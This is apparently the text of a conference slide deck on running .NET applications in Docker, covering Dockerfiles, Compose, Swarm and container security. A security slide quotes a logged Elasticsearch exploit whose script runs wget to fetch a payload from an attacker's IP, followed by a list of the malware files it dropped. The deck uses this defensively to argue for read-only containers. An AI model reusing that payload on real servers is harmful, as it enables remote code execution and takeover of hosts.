Running .NET on Docker

Running .NET on Docker@Ben_Hall

Ben@BenHall.me.ukOcelot Uproar / Katacoda.com

Running .NET on Docker@Ben_Hall

Ben@BenHall.me.ukOcelot Uproar / Katacoda.com

@Ben_Hall / Blog.BenHall.me.uk

WH

O AM

I?

Learn via Interactive Browser-Based LabsKatacoda.com

Agenda

• Getting started with Docker• Windows Containers vs Linux Containers• Building .NET applications as containers• Deploying containers• The future

doger.io

https://www.docker.com/whatisdocker/

Container

Own Process SpaceOwn Network InterfaceOwn Root Directories

Sandboxed

Like a lightweight VM. But it’s not a VM.

Container

Native CPUNative Memory

Native IO

No Pre-AllocationNo Performance Overheard

Container

Milliseconds to launch

Docker - An open platform for distributed applications for developers and sysadmins.

Got us to agree on something!

Batteries included but removable

> docker run –p 6379:6379 redis:3.0.3 _.-``__ ''-._ _.-`` `. `_. ''-._ Redis 3.0.3 (00000000/0) 64 bit .-`` .-```. ```\/ _.,_ ''-._ ( ' , .-` | `, ) Running in standalone mode |`-._`-...-` __...-.``-._|'` _.-'| Port: 6379 | `-._ `._ / _.-' | PID: 1 `-._ `-._ `-./ _.-' _.-' |`-._`-._ `-.__.-' _.-'_.-'| | `-._`-._ _.-'_.-' | http://redis.io `-._ `-._`-.__.-'_.-' _.-' |`-._`-._ `-.__.-' _.-'_.-'| | `-._`-._ _.-'_.-' | `-._ `-._`-.__.-'_.-' _.-' `-._ `-.__.-' _.-' `-._ _.-' `-.__.-'

1:M 05 Nov 10:42:24.402 # Server started, Redis version 3.0.31:M 05 Nov 10:42:24.402 # WARNING overcommit_memory is set to 0! Background save may fail under low memory condition. To fix this issue add 'vm.overcommit_memory = 1' to /etc/sysctl.conf and then reboot or run the command 'sysctl vm.overcommit_memory=1' for this to take effect.1:M 05 Nov 10:42:24.402 # WARNING you have Transparent Huge Pages (THP) support enabled in your kernel. This will create latency and memory usage issues with Redis. To fix this issue run the command 'echo never > /sys/kernel/mm/transparent_hugepage/enabled' as root, and add it to your /etc/rc.local in order to retain the setting after a reboot. Redis must be restarted after THP is disabled.1:M 05 Nov 10:42:24.403 # WARNING: The TCP backlog setting of 511 cannot be enforced because /proc/sys/net/core/somaxconn is set to the lower value of 128.1:M 05 Nov 10:42:24.403 * The server is now ready to accept connections on port 6379

Installing on OSX / Windows

https://www.docker.com/getdocker

Installing In Production'curl -sSL https://get.docker.com/ | sh'

Very Simple Host

A computer station that runs docker daemon

Windows Containers, Linux Containers

Kernel Virtualisation

Base Image

Linux Containers

• Centos, Ubuntu, Alpine

• Binaries built for Linux kernel

Windows Containers

• Windows Server Core, Windows Nano

• Binaries built for Windows

Building Docker Containers

https://www.katacoda.com/courses/dotnet-in-docker/deploying-aspnet-core-as-docker-container

$ cat Dockerfile-linuxFROM microsoft/dotnet:1.0.0-preview2-sdk

$ cat Dockerfile-linuxFROM microsoft/dotnet:1.0.0-preview2-sdk

RUN mkdir /appWORKDIR /app

COPY project.json /appRUN ["dotnet", "restore"]

$ cat Dockerfile-linuxFROM microsoft/dotnet:1.0.0-preview2-sdk

RUN mkdir /appWORKDIR /app

COPY project.json /appRUN ["dotnet", "restore"]

COPY . /appRUN ["dotnet", "build"]

$ cat Dockerfile-linuxFROM microsoft/dotnet:1.0.0-preview2-sdk

RUN mkdir /appWORKDIR /app

COPY project.json /appRUN ["dotnet", "restore"]

COPY . /appRUN ["dotnet", "build"]

EXPOSE 5000/tcpCMD ["dotnet", "run"]

$ docker build -t aspnet-app:v0.1 .

$ docker run -d \ -t -p 5000:5000 \ --name app \ aspnet-app:v0.1

$ type Dockerfile-windows

FROM microsoft/iis:windowsservercore-10.0.14393.693

$ type Dockerfile-windows

FROM microsoft/iis:windowsservercore-10.0.14393.693SHELL ["powershell", "-command“]

RUN Install-WindowsFeature NET-Framework-45-ASPNET; Install-WindowsFeature Web-Asp-Net45

RUN Remove-Website -Name 'Default Web Site'; \ mkdir c:\NerdDinner; \ New-Website -Name 'nerd-dinner' \ -Port 80 -PhysicalPath 'c:\NerdDinner' \ -ApplicationPool '.NET v4.5‘

COPY NerdDinner c:\NerdDinner

$ type Dockerfile-windows

FROM microsoft/iis:windowsservercore-10.0.14393.693SHELL ["powershell", "-command"]

RUN Install-WindowsFeature NET-Framework-45-ASPNET; Install-WindowsFeature Web-Asp-Net45

RUN Remove-Website -Name 'Default Web Site'; \ mkdir c:\NerdDinner; \ New-Website -Name 'nerd-dinner' \ -Port 80 -PhysicalPath 'c:\NerdDinner' \ -ApplicationPool '.NET v4.5‘

EXPOSE 80

COPY NerdDinner c:\NerdDinner

> cat DockerfileFROM node:6

RUN mkdir -p /usr/src/appWORKDIR /usr/src/app

COPY . /usr/src/appRUN npm install

CMD [ "npm", "start" ]

> docker build –t nodeapp .

> docker run –d –p 3000 nodeapp

Visual Studio Integration

Debugging Node.js with VS CodeEXPOSE 3000EXPOSE 5858CMD ["node", "--debug=5858","index.js"]

docker run -d -p 3000:3000 -p 5858:5858 nodeapp

Docker in Production

Containers can’t fix broken architectures.

But they can help…

Production isn’t special

Just another environment

ImmutableDisposable Container Pattern

Docker Compose

> docker-compose up -d> cat docker-compose.yml

web: image: ocelotuproar/katacoda volumes: - /opt/projects/katacoda/data:/usr/src/app/data - /opt/docker/katacoda/db:/usr/src/app/ocelite-db - /var/run/docker.sock:/var/run/docker.sock ports: - 3000 environment: VIRTUAL_HOST: 'katacoda.com,*.katacoda.com' NODE_ENV: 'production’ restart: always

// Production version of docker-compose-dev.yml

> docker-compose up # Start containers–d # In background

Recreating katacoda_nginx_1...Recreating katacoda_redis_1...Recreating katacoda_db_1...Recreating katacoda_elasticsearch_1...Recreating katacoda_web_1…

> docker-compose stop # Stop containersStopping katacoda_web_1...Stopping katacoda_elasticsearch_1...Stopping katacoda_db_1...Stopping katacoda_redis_1...Stopping katacoda_nginx_1...

Swarm

• https://www.katacoda.com/courses/docker-orchestration/

$ docker service create \ --name http \ --network skynet \ --replicas 2 \ -p 80:80 \ katacoda/docker-http-server

Constraint Scheduler$ docker run \ -e constraint:ostypelabel==windowscompat \ windowservercore cmd

$ docker run \ -e constraint:ostypelabel==linuxcompat \ ubuntu bash

Microsoft, Apprenda, Red Hat

https://github.com/kubernetes/kubernetes/issues/22623

Common Question: Is it secure?

Hosting provider becomes unhappy

org.elasticsearch.search.SearchParseException: [index][3]: query[ConstantScore(*:*)],from[-1],size[1]: Parse Failure [Failed to parse source [{"size":1,"query":{"filtered":{"query":{"match_all":{}}}},"script_fields":{"exp":{"script":"import java.util.*;\nimport java.io.*;\nString str = \"\";BufferedReader br = new BufferedReader(new InputStreamReader(Runtime.getRuntime().exec(\"wget -O /tmp/xdvi http://<IP Address>:9985/xdvi\").getInputStream()));StringBuilder sb = new StringBuilder();while((str=br.readLine())!=null){sb.append(str);}sb.toString();"}}}]]

http://blog.benhall.me.uk/2015/09/what-happens-when-an-elasticsearch-container-is-hacked/

C /binC /bin/netstatC /bin/psC /bin/ssC /etcC /etc/init.dA /etc/init.d/DbSecuritySptA /etc/init.d/selinuxC /etc/rc1.dA /etc/rc1.d/S97DbSecuritySptA /etc/rc1.d/S99selinuxC /etc/rc2.dA /etc/rc2.d/S97DbSecuritySptA /etc/rc2.d/S99selinuxC /etc/rc3.dA /etc/rc3.d/S97DbSecuritySptA /etc/rc3.d/S99selinuxC /etc/rc4.dA /etc/rc4.d/S97DbSecuritySptA /etc/rc4.d/S99selinuxC /etc/rc5.d

http://blog.benhall.me.uk/2015/09/what-happens-when-an-elasticsearch-container-is-hacked/

A /etc/rc5.d/S97DbSecuritySptA /etc/rc5.d/S99selinuxC /etc/sshA /etc/ssh/bfgffaA /os6A /safe64C /tmpA /tmp/.Mm2A /tmp/64A /tmp/6SxxA /tmp/6UbbA /tmp/DDos99A /tmp/cmd.nA /tmp/conf.nA /tmp/ddos8A /tmp/dp25A /tmp/frccA /tmp/gates.lodA /tmp/hkddosA /tmp/hsperfdata_rootA /tmp/linux32

A /tmp/linux64A /tmp/managerA /tmp/moni.lodA /tmp/nbA /tmp/o32A /tmp/obaA /tmp/okmlA /tmp/oniA /tmp/yn25C /usrC /usr/binA /usr/bin/.sshdA /usr/bin/dpkgdA /usr/bin/dpkgd/netstatA /usr/bin/dpkgd/psA /usr/bin/dpkgd/ss

Read Only Containers

> docker run –-read-only \ –v /data:/data \ elasticsearch

Is Docker Secure?

• Yes. It’s as secure as your practices are.• ElasticSearch hack would have taken over

entire box• New game, new rules to play by

Your local machine is now the same as production

The Future?

Docker + Windows

Microsoft

SQL Server as a Container

Visual Studio as a Container?

RStudio

• docker run -d -p 8787:8787 rocker/rstudio

Docker + Desktop Applications

https://blog.jessfraz.com/post/docker-containers-on-the-desktop/

It’s amazing, but a little confusing.

$ docker run -it \ -v /etc/localtime:/etc/localtime \ -v /tmp/.X11-unix:/tmp/.X11-unix \ -e DISPLAY=unix$DISPLAY \ --device /dev/snd \ --link pulseaudio:pulseaudio \ -e PULSE_SERVER=pulseaudio \ --device /dev/video0 \ --name skype \ jess/skype

It’s amazing, but a little confusing.

$ docker run -it \ -v /etc/localtime:/etc/localtime \ -v /tmp/.X11-unix:/tmp/.X11-unix \ -e DISPLAY=unix$DISPLAY \ --device /dev/snd \ --link pulseaudio:pulseaudio \ -e PULSE_SERVER=pulseaudio \ --device /dev/video0 \ --name skype \ jess/skype

http://www.katacoda.com/

Thank you!

@Ben_HallBen@BenHall.me.ukBlog.BenHall.me.uk

www.Katacoda.com